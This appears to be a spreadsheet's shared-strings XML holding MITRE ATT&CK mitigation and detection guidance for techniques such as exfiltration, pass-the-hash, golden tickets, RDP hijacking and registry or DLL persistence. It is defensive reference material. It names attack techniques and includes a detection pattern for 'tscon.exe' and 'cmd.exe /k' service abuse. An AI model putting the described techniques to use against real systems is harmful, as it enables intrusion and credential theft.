    <t>Identify unnecessary system utilities, third-party tools, or potentially malicious software that may be used to encrypt files, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/wiki/T1030</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/wiki/T1048</t>
  </si>
  <si>
    <t>Follow best practices for network firewall configurations to allow only necessary ports and traffic to enter and exit the network. For example, if services like FTP are not required for sending information outside of a network, then block FTP-related ports at the network perimeter. Enforce proxies and use dedicated servers for services such as DNS and only allow those systems to communicate over respective ports/protocols, instead of all systems within a network.[[CiteRef::TechNet Firewall Design]] These actions will help reduce command and control and exfiltration path opportunities.
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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/wiki/T1041</t>
  </si>
  <si>
    <t>Mitigations for command and control apply.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</si>
  <si>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t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1011</t>
  </si>
  <si>
    <t>Monitor file access on removable media. Detect processes that execute when removable media are mounted. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1052</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</si>
  <si>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 ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1029</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</si>
  <si>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[[T1055|Process Injection]] for attempts to hide execution, evidence of [[Discovery]], or other unusual network traffic that may indicate additional tools transferred to the system. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1189</t>
  </si>
  <si>
    <t>Drive-by compromise relies on there being a vulnerable piece of software on the client end systems. Use modern browsers with security features turned on. Ensure all browsers and plugins kept updated can help prevent the exploit phase of this technique.
For malicious code served up through ads, adblockers can help prevent that code from executing in the first place. Script blocking extensions can help prevent the execution of JavaScript that may commonly be used during the exploitation process.
Browser sandboxes can be used to mitigate some of the impact of exploitation, but sandbox escapes may still exist.[[CiteRef::Windows Blogs Microsoft Edge Sandbox]][[CiteRef::Ars Technica Pwn2Own 2017 VM Escape]]
Other types of virtualization and application microsegmentation may also mitigate the impact of client-side exploitation. The risks of additional exploits and weaknesses in implementation may still exist.[[CiteRef::Ars Technica Pwn2Own 2017 VM Escape]]
Security applications that look for behavior used during exploitation such as Windows Defender Exploit Guard (WDEG) and the Enhanced Mitigation Experience Toolkit (EMET) can be used to mitigate some exploitation behavior.[[CiteRef::TechNet Moving Beyond EMET]] Control flow integrity checking is another way to potentially identify and stop a software exploit from occurring.[[CiteRef::Wikipedia Control Flow Integrity]] Many of these protections depend on the architecture and target application binary for compatibility.</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/wiki/T1190</t>
  </si>
  <si>
    <t>Application Isolation and least privilege help lesson the impact of an exploit. Application isolation will limit what other processes and system features the exploited target can access, and least privilege for service accounts will limit what permissions the exploited process gets on the rest of the system. Web Application Firewalls may may be used to limit exposure of applications.
Segment externally facing servers and services from the rest of the network with a DMZ or on separate hosting infrastructure.
Use secure coding best practices when designing custom software that is meant for deployment to externally facing systems. Avoid issues documented by OWASP, CWE, and other software weakness identification efforts.
Regularly scan externally facing systems for vulnerabilities and establish procedures to rapidly patch systems when critical vulnerabilities are discovered through scanning and through public disclosure.</t>
  </si>
  <si>
    <t>Asset management systems may help with the detection of computer systems or network devices that should not exist on a network. 
Endpoint sensors may be able to detect the addition of hardware via USB, Thunderbolt, and other external device communication ports. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1200</t>
  </si>
  <si>
    <t>Establish network access control policies, such as using device certificates and the 802.1x standard.[[CiteRef::Wikipedia 802.1x]] Restrict use of DHCP to registered devices to prevent unregistered devices from communicating with trusted systems. 
Block unknown devices and accessories by endpoint security configuration and monitoring agent.</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</si>
  <si>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[[T1203|Exploitation for Client Execution]] and [[T1064|Scripting]]. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1193</t>
  </si>
  <si>
    <t>Network intrusion prevention systems and systems designed to scan and remove malicious email attachments can be used to block activity. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.
Block unknown or unused attachments by default that should not be transmitted over email as a best practice to prevent some vectors, such as .scr, .exe, .pif, .cpl, etc. Some email scanning devices can open and analyze compressed and encrypted formats, such as zip and rar that may be used to conceal malicious attachments in [[T1027|Obfuscated Files or Information]].
Because this technique involves user interaction on the endpoint, it's difficult to fully mitigate. However, there are potential mitigations. Users can be trained to identify social engineering techniques and spearphishing emails. To prevent the attachments from executing, application whitelisting can be used. Anti-virus can also automatically quarantine suspicious files.</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</si>
  <si>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[[T1204|User Execution]] occurs. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1192</t>
  </si>
  <si>
    <t>Because this technique involves user interaction on the endpoint, it's difficult to fully mitigate. However, there are potential mitigations. Users can be trained to identify social engineering techniques and spearphishing emails with malicious links. Other mitigations can take place as [[T1204|User Execution]] occurs.</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</si>
  <si>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[[T1203|Exploitation for Client Execution]] and [[T1064|Scripting]]. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1194</t>
  </si>
  <si>
    <t>Determine if certain social media sites, personal webmail services, or other service that can be used for spearphishing is necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk.
Because this technique involves use of legitimate services and user interaction on the endpoint, it's difficult to fully mitigate. However, there are potential mitigations. Users can be trained to identify social engineering techniques and spearphishing emails with malicious links. To prevent the downloads from executing, application whitelisting can be used. Anti-virus can also automatically quarantine suspicious files.</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</si>
  <si>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 ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1195</t>
  </si>
  <si>
    <t>Apply supply chain risk management (SCRM) practices and procedures[[CiteRef::MITRE SE Guide 2014]], such as supply chain analysis and appropriate risk management, throughout the life-cycle of a system.
Leverage established software development lifecycle (SDLC) practices[[CiteRef::NIST Supply Chain 2012]]: 
* Uniquely Identify Supply Chain Elements, Processes, and Actors
* Limit Access and Exposure within the Supply Chain
* Establish and Maintain the Provenance of Elements, Processes, Tools, and Data
* Share Information within Strict Limits
* Perform SCRM Awareness and Training
* Use Defensive Design for Systems, Elements, and Processes
* Perform Continuous Integrator Review
* Strengthen Delivery Mechanisms
* Assure Sustainment Activities and Processes
* Manage Disposal and Final Disposition Activities throughout the System or Element Life Cycle</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</si>
  <si>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 ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1199</t>
  </si>
  <si>
    <t>Network segmentation can be used to isolate infrastructure components that do not require broad network access. Properly manage accounts and permissions used by parties in trusted relationships to minimize potential abuse by the party and if the party is compromised by an adversary. Vet the security policies and procedures of organizations that are contracted for work that require privileged access to network resources.</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</si>
  <si>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 ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1017</t>
  </si>
  <si>
    <t>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[[T1068|Exploitation for Privilege Escalation]].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</si>
  <si>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Monitor for COM objects loading DLLs and other modules not typically associated with the application.[[CiteRef::Enigma Outlook DCOM Lateral Movement Nov 2017]]
Monitor for spawning of processes associated with COM objects, especially those invoked by a user different than the one currently logged on.
Monitor for influx of Distributed Computing Environment/Remote Procedure Call (DCE/RPC) traffic. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1175</t>
  </si>
  <si>
    <t>Modify Registry settings (directly or using Dcomcnfg.exe) in &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{AppID_GUID}&lt;/code&gt; associated with the process-wide security of individual COM applications.[[CiteRef::Microsoft Process Wide Com Keys]]
Modify Registry settings (directly or using Dcomcnfg.exe) in &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole&lt;/code&gt; associated with system-wide security defaults for all COM applications that do no set their own process-wide security.[[CiteRef::Microsoft System Wide Com Keys]][[CiteRef::Microsoft COM ACL]]
Consider disabling DCOM through Dcomcnfg.exe.[[CiteRef::Microsoft Disable DCOM]]
Enable Windows firewall, which prevents DCOM instantiation by default.
Ensure all COM alerts and Protected View are enabled.[[CiteRef::Microsoft Protected View]]</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</si>
  <si>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[[T1055|Process Injection]] for attempts to hide execution, evidence of [[Discovery]], or other unusual network traffic that may indicate additional tools transferred to the system. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1210</t>
  </si>
  <si>
    <t>Segment networks and systems appropriately to reduce access to critical systems and services to controlled methods. Minimize available services to only those that are necessary. Regularly scan the internal network for available services to identify new and potentially vulnerable services. Minimize permissions and access for service accounts to limit impact of exploitation.
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if available. Other types of virtualization and application microsegmentation may also mitigate the impact of some types of exploitation. The risks of additional exploits and weaknesses in implementation may still exist.[[CiteRef::Ars Technica Pwn2Own 2017 VM Escape]]
Security applications that look for behavior used during exploitation such as Windows Defender Exploit Guard (WDEG) and the Enhanced Mitigation Experience Toolkit (EMET) can be used to mitigate some exploitation behavior.[[CiteRef::TechNet Moving Beyond EMET]] Control flow integrity checking is another way to potentially identify and stop a software exploit from occurring.[[CiteRef::Wikipedia Control Flow Integrity]] Many of these protections depend on the architecture and target application binary for compatibility and may not work for all software or services targeted.</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</si>
  <si>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t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1075</t>
  </si>
  <si>
    <t>Monitor systems and domain logs for unusual credential logon activity. Prevent access to [[T1078|Valid Accounts]]. Apply patch KB2871997 to Windows 7 and higher systems to limit the default access of accounts in the local administrator group. 
Enable pass the hash mitigations to apply UAC restrictions to local accounts on network logon. The associated Registry key is located &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy&lt;/code&gt; Through GPO: Computer Configuration &gt; [Policies] &gt; Administrative Templates &gt; SCM: Pass the Hash Mitigations: Apply UAC restrictions to local accounts on network logons.[[CiteRef::GitHub IAD Secure Host Baseline UAC Filtering]]
Limit credential overlap across systems to prevent the damage of credential compromise and reduce the adversary's ability to perform [[Lateral Movement]] between systems. Ensure that built-in and created local administrator accounts have complex, unique passwords. Do not allow a domain user to be in the local administrator group on multiple systems.</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</si>
  <si>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ticket.[[CiteRef::CERT-EU Golden Ticket Protection]] ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1097</t>
  </si>
  <si>
    <t>Monitor domains for unusual credential logons. Limit credential overlap across systems to prevent the damage of credential compromise. Ensure that local administrator accounts have complex, unique passwords. Do not allow a user to be a local administrator for multiple systems. Limit domain admin account permissions to domain controllers and limited servers. Delegate other admin functions to separate accounts.[[CiteRef::ADSecurity AD Kerberos Attacks]]
For containing the impact of a previously generated golden ticket, reset the built-in KRBTGT account password twice, which will invalidate any existing golden tickets that have been created with the KRBTGT hash and other Kerberos tickets derived from it.[[CiteRef::CERT-EU Golden Ticket Protection]]
Attempt to identify and block unknown or malicious software that could be used to obtain Kerberos tickets and use them to authenticate by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</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</si>
  <si>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4688 for &lt;code&gt;tscon.exe&lt;/code&gt; usage and monitor service creation that uses &lt;code&gt;cmd.exe /k&lt;/code&gt; or &lt;code&gt;cmd.exe /c&lt;/code&gt; in its arguments to prevent RDP session hijacking. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1076</t>
  </si>
  <si>
    <t>Disable the RDP service if it is unnecessary, remove unnecessary accounts and groups from Remote Desktop Users groups, and enable firewall rules to block RDP traffic between network security zones. Audit the Remote Desktop Users group membership regularly. Remove the local Administrators group from the list of groups allowed to log in through RDP. Limit remote user permissions if remote access is necessary. Use remote desktop gateways and multifactor authentication for remote logins.[[CiteRef::Berkley Secure]] Do not leave RDP accessible from the internet. Change GPOs to define shorter timeouts sessions and maximum amount of time any single session can be active. Change GPOs to specify the maximum amount of time that a disconnected session stays active on the RD session host server. [[CiteRef::Windows RDP Sessions]]</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</si>
  <si>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t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1021</t>
  </si>
  <si>
    <t>Limit the number of accounts that may use remote services. Use multifactor authentication where possible. Limit the permissions for accounts that are at higher risk of compromise; for example, configure SSH so users can only run specific programs. Prevent [[Credential Access]] techniques that may allow an adversary to acquire [[T1078|Valid Accounts]] that can be used by existing services.</t>
  </si>
  <si>
    <t>Use file and 4688 to detect when files are written to a Web server by a process that is not the normal Web server process or when files are written outside of normal administrative time periods. Use 4688 to identify normal processes that run on the Web server and detect processes that are not typically executed. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1051</t>
  </si>
  <si>
    <t>Networks that allow for open development and testing of Web content and allow users to set up their own Web servers on the enterprise network may be particularly vulnerable if the systems and Web servers are not properly secured to limit privileged account use, unauthenticated network share access, and network/system isolation.
Ensure proper permissions on directories that are accessible through a Web server. Disallow remote access to the webroot or other directories used to serve Web content. Disable execution on directories within the webroot. Ensure that permissions of the Web server process are only what is required by not using built-in accounts; instead, create specific accounts to limit unnecessary access or permissions overlap across multiple systems.</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</si>
  <si>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 ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1080</t>
  </si>
  <si>
    <t>Protect shared folders by minimizing users who have write access. Use utilities that detect or mitigate common features used in exploitation, such as the Microsoft Enhanced Mitigation Experience Toolkit (EMET).
Reduce potential lateral movement risk by using web-based document management and collaboration services that do not use network file and directory sharing.
Identify potentially malicious software that may be used to taint content or may result from it and audit and/or block the unknown programs by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>Ensure that proper logging of accounts used to log into systems is turned on and centrally collected. Windows logging is able to collect success/failure for accounts that may be used to move laterally and can be collected using tools such as Windows Event Forwarding.[[CiteRef::Lateral Movement Payne]][[CiteRef::Windows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[[Software/S0039|Net]], on the command-line interface and [[Discovery]] techniques that could be used to find remotely accessible systems. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1077</t>
  </si>
  <si>
    <t>Do not reuse local administrator account passwords across systems. Ensure password complexity and uniqueness such that the passwords cannot be cracked or guessed. Deny remote use of local admin credentials to log into systems. Do not allow domain user accounts to be in the local Administrators group multiple systems.
Identify unnecessary system utilities or potentially malicious software that may be used to leverage SMB and the Windows admin shares, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>Lateral Movement,Credential Access,Initial Access</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</si>
  <si>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 ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1091</t>
  </si>
  <si>
    <t>Disable Autorun if it is unnecessary.[[CiteRef::Microsoft Disable Autorun]] Disallow or restrict removable media at an organizational policy level if it is not required for business operations.[[CiteRef::TechNet Removable Media Control]]
Identify potentially malicious software that may be used to infect removable media or may result from tainted removable media, and audit and/or block it by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>Lateral Movement,Persistence</t>
  </si>
  <si>
    <t>Monitor logon scripts for unusual access by abnormal users or at abnormal times. Look for files added or modified by unusual accounts outside of normal administration duties. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1037</t>
  </si>
  <si>
    <t>Restrict write access to logon scripts to specific administrators. Prevent access to administrator accounts by mitigating [[Credential Access]] techniques and limiting account access and permissions of [[T1078|Valid Accounts]].
Identify and block potentially malicious software that may be executed through logon script modification by using whitelisting[[CiteRef::Beechey 2010]] tools like AppLocker[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] that are capable of auditing and/or blocking unknown programs.</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</si>
  <si>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8.[[CiteRef::Graeber 2014]][[CiteRef::Microsoft Configure LSA]] ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1131</t>
  </si>
  <si>
    <t>Windows 8.1, Windows Server 2012 R2, and later versions, may make LSA run as a Protected Process Light (PPL) by setting the Registry key &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL&lt;/code&gt;, which requires all DLLs loaded by LSA to be signed by Microsoft.[[CiteRef::Graeber 2014]][[CiteRef::Microsoft Configure LSA]]</t>
  </si>
  <si>
    <t>Perform integrity checking on MBR and VBR. Take snapshots of MBR and VBR and compare against known good samples. Report changes to MBR and VBR as they occur for indicators of suspicious activity and further analysis. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1067</t>
  </si>
  <si>
    <t>Ensure proper permissions are in place to help prevent adversary access to privileged accounts necessary to perform this action. Use Trusted Platform Module technology and a secure or trusted boot process to prevent system integrity from being compromised.[[CiteRef::TCG Trusted Platform Module]][[CiteRef::TechNet Secure Boot Process]]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</si>
  <si>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 ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1176</t>
  </si>
  <si>
    <t>Only install browser extensions from trusted sources that can be verified. Ensure extensions that are installed are the intended ones as many malicious extensions will masquerade as legitimate ones.
Browser extensions for some browsers can be controlled through Group Policy. Set a browser extension white or black list as appropriate for your security policy.[[CiteRef::Technospot Chrome Extensions GP]]
Change settings to prevent the browser from installing extensions without sufficient permissions.
Close out all browser sessions when finished using them.</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</si>
  <si>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 ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1042</t>
  </si>
  <si>
    <t>Direct mitigation of this technique is not recommended since it is a legitimate function that can be performed by users for software preferences. Follow Microsoft's best practices for file associations.[[CiteRef::MSDN File Associations]]
Identify and block potentially malicious software that may be executed by this technique using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system and domain controller.[[CiteRef::Microsoft User Creation Event]] Perform regular audits of domain and local system accounts to detect suspicious accounts that may have been created by an adversary. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1136</t>
  </si>
  <si>
    <t>Use and enforce multifactor authentication. Follow guidelines to prevent or limit adversary access to [[T1078|Valid Accounts]] that may be used to create privileged accounts within an environment.
Adversaries that create local accounts on systems may have limited access within a network if access levels are properly locked down. These accounts may only be needed for persistence on individual systems and their usefulness depends on the utility of the system they reside on.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</si>
  <si>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Follow best practices for detecting adversary use of [[T1078|Valid Accounts]] for authenticating to remote services. Collect authentication logs and analyze for unusual access patterns, windows of activity, and access outside of normal business hours. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1133</t>
  </si>
  <si>
    <t>Limit access to remote services through centrally managed concentrators such as VPNs and other managed remote access systems. Deny direct remote access to internal systems through uses of network proxies, gateways, and firewalls as appropriate. Disable or block services such as [[T1028|Windows Remote Management]] can be used externally. Use strong two-factor or multi-factor authentication for remote service accounts to mitigate an adversary's ability to leverage stolen credentials, but be aware of [[T1111|Two-Factor Authentication Interception]] techniques for some two-factor authentication implementations.</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</si>
  <si>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present.[[CiteRef::virtualization.info 2006]] ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1062</t>
  </si>
  <si>
    <t>Prevent adversary access to privileged accounts necessary to install a hypervisor.</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</si>
  <si>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persistence.[[CiteRef::TechNet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[[Software/S0106|cmd]] commands or scripts.
Look for abnormal process call trees from known services and for execution of other commands that could relate to [[Discovery]] or other adversary techniques. Services may also be modified through Windows system management tools such as [[T1047|Windows Management Instrumentation]] and [[T1086|PowerShell]], so additional logging may need to be configured to gather the appropriate data. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1031</t>
  </si>
  <si>
    <t>Use auditing tools capable of detecting privilege and service abuse opportunities on systems within an enterprise and correct them. Limit privileges of user accounts and groups so that only authorized administrators can interact with service changes and service configurations. Toolkits like the PowerSploit framework contain the PowerUp modules that can be used to explore systems for [[Privilege Escalation]] weaknesses.[[CiteRef::Powersploit]]
Identify and block potentially malicious software that may be executed through service abuse by using whitelisting[[CiteRef::Beechey 2010]] tools like AppLocker[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] that are capable of auditing and/or blocking unknown programs.</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</si>
  <si>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software.[[CiteRef::Demaske Netsh Persistence]] ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1128</t>
  </si>
  <si>
    <t>Identify and block potentially malicious software that may persist in this manner by using whitelisting[[CiteRef::Beechey 2010]] tools capable of monitoring DLL loads by Windows utilities like AppLocker.[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]]</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</si>
  <si>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add-ins.[[CiteRef::MRWLabs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t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1137</t>
  </si>
  <si>
    <t>Follow Office macro security best practices suitable for your environment. Disable Office VBA macros from executing. Even setting to disable with notification could enable unsuspecting users to execute potentially malicious macros.[[CiteRef::TechNet Office Macro Security]]
For the Office Test method, create the Registry key used to execute it and set the permissions to "Read Control" to prevent easy access to the key without administrator permissions or requiring [[Privilege Escalation]].[[CiteRef::Palo Alto Office Test Sofacy]]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executing.[[CiteRef::MRWLabs Office Persistence Add-ins]]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</si>
  <si>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folders.[[CiteRef::TechNet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t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1060</t>
  </si>
  <si>
    <t>Identify and block potentially malicious software that may be executed through run key or startup folder persistence using whitelisting[[CiteRef::Beechey 2010]] tools like AppLocker[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</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</si>
  <si>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 ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1180</t>
  </si>
  <si>
    <t>Block .scr files from being executed from non-standard locations. Set Group Policy to force users to have a dedicated screensaver where local changes should not override the settings to prevent changes. Use Group Policy to disable screensavers if they are unnecessary.[[CiteRef::TechNet Screensaver GP]]</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</si>
  <si>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8.[[CiteRef::Graeber 2014]][[CiteRef::Microsoft Configure LSA]] ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1101</t>
  </si>
  <si>
    <t>Windows 8.1, Windows Server 2012 R2, and later versions may make LSA run as a Protected Process Light (PPL) by setting the Registry key &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL&lt;/code&gt;, which requires all SSP DLLs to be signed by Microsoft.[[CiteRef::Graeber 2014]][[CiteRef::Microsoft Configure LSA]]</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</si>
  <si>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t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1023</t>
  </si>
  <si>
    <t>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links.[[CiteRef::UCF STIG Symbolic Links]]
Identify and block unknown, potentially malicious software that may be executed through shortcut modification by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>System firmware manipulation may be detected.[[CiteRef::MITRE Trustworthy Firmware Measurement]] Dump and inspect BIOS images on vulnerable systems and compare against known good images.[[CiteRef::MITRE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performed.[[CiteRef::McAfee CHIPSEC Blog]][[CiteRef::Github CHIPSEC]][[CiteRef::Intel HackingTeam UEFI Rootkit]] ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1019</t>
  </si>
  <si>
    <t>Prevent adversary access to privileged accounts or access necessary to perform this technique. Check the integrity of the existing BIOS or EFI to determine if it is vulnerable to modification. Patch the BIOS and EFI as necessary. Use Trusted Platform Module technology.[[CiteRef::TCG Trusted Platform Module]]</t>
  </si>
  <si>
    <t>Baseline values and monitor/analyze activity related to modifying W32Time information in the Registry, including application programming interface (API) calls such as RegCreateKeyEx and RegSetValueEx as well as execution of the W32tm.exe utility.[[CiteRef::Microsoft W32Time May 2017]] There is no restriction on the number of custom time providers registrations, though each may require a DLL payload written to disk.[[CiteRef::Github W32Time Oct 2017]]
The Sysinternals Autoruns tool may also be used to analyze auto-starting locations, including DLLs listed as time providers.[[CiteRef::TechNet Autoruns]] ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1209</t>
  </si>
  <si>
    <t>Identify and block potentially malicious software that may be executed as a time provider by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] that are capable of auditing and/or blocking unknown DLLs.
Consider using Group Policy to configure and block subsequent modifications to W32Time parameters.[[CiteRef::Microsoft W32Time May 2017]]</t>
  </si>
  <si>
    <t>Monitor WMI event subscription entries, comparing current WMI event subscriptions to known good subscriptions for each host. Tools such as Sysinternals Autoruns may also be used to detect WMI changes that could be attempts at persistence.[[CiteRef::TechNet Autoruns]] ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1084</t>
  </si>
  <si>
    <t>Disabling WMI services may cause system instability and should be evaluated to assess the impact to a network. By default, only administrators are allowed to connect remotely using WMI; restrict other users that are allowed to connect, or disallow all users from connecting remotely to WMI. Prevent credential overlap across systems of administrator and privileged accounts.[[CiteRef::FireEye WMI 2015]]</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</si>
  <si>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values.[[CiteRef::TechNet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 ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1004</t>
  </si>
  <si>
    <t>Limit the privileges of user accounts so that only authorized administrators can perform Winlogon helper changes.
Identify and block potentially malicious software that may be executed through the Winlogon helper process by using whitelisting[[CiteRef::Beechey 2010]] tools like AppLocker[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] that are capable of auditing and/or blocking unknown DLLs.</t>
  </si>
  <si>
    <t>Persistence,Privilege Escalation</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</si>
  <si>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 ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1015</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</si>
  <si>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later.[[CiteRef::TechNet RDP NLA]]
If possible, use a Remote Desktop Gateway to manage connections and security configuration of RDP within a network.[[CiteRef::TechNet RDP Gateway]]
Identify and block potentially malicious software that may be executed by an adversary with this technique by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</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</si>
  <si>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overlook AppCert DLLs as an auto-starting location.[[CiteRef::TechNet Autoruns]][[CiteRef::Sysinternals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</si>
  <si>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https://attack.mitre.org/wiki/T1182</t>
  </si>
  <si>
    <t>Identify and block potentially malicious software that may be executed through AppCert DLLs by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] that are capable of auditing and/or blocking unknown DLLs.</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</si>
  <si>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also be used to detect system changes that could be attempts at persistence, including listing current AppInit DLLs.[[CiteRef::TechNet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</si>
  <si>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https://attack.mitre.org/wiki/T1103</t>
  </si>
  <si>
    <t>Upgrade to Windows 8 or later and enable secure boot.
Identify and block potentially malicious software that may be executed through AppInit DLLs by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] that are capable of auditing and/or blocking unknown DLLs.</t>
  </si>
  <si>
    <t>There are several public tools available that will detect shims that are currently available[[CiteRef::Black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 ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1138</t>
  </si>
  <si>
    <t>There currently aren't a lot of ways to mitigate application shimming. Disabling the Shim Engine isn't recommended because Windows depends on shimming for interoperability and software may become unstable or not work. Microsoft released an optional patch update - KB3045645 - that will remove the "auto-elevate" flag within the sdbinst.exe. This will prevent use of application shimming to bypass UAC. 
Changing UAC settings to "Always Notify" will give the user more visibility when UAC elevation is requested, however, this option will not be popular among users due to the constant UAC interruptions.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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/wiki/T1044</t>
  </si>
  <si>
    <t>Use auditing tools capable of detecting file system permissions abuse opportunities on systems within an enterprise and correct them. Limit privileges of user accounts and groups so that only authorized administrators can interact with service changes and service binary target path locations. Toolkits like the PowerSploit framework contain PowerUp modules that can be used to explore systems for service file system permissions weaknesses.[[CiteRef::Powersploit]]
Identify and block potentially malicious software that may be executed through abuse of file, directory, and service permissions by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] that are capable of auditing and/or blocking unknown programs. Deny execution from user directories such as file download directories and temp directories where able.[[CiteRef::Seclists Kanthak 7zip Installer]]
Turn off UAC's privilege elevation for standard users &lt;code&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]&lt;/code&gt;to automatically deny elevation requests, add: &lt;code&gt;"ConsentPromptBehaviorUser"=dword:00000000&lt;/code&gt;[[CiteRef::Seclists Kanthak 7zip Installer]].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</si>
  <si>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[[T1047|Windows Management Instrumentation]] and [[T1086|PowerShell]], so additional logging may need to be configured to gather the appropriate data. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1050</t>
  </si>
  <si>
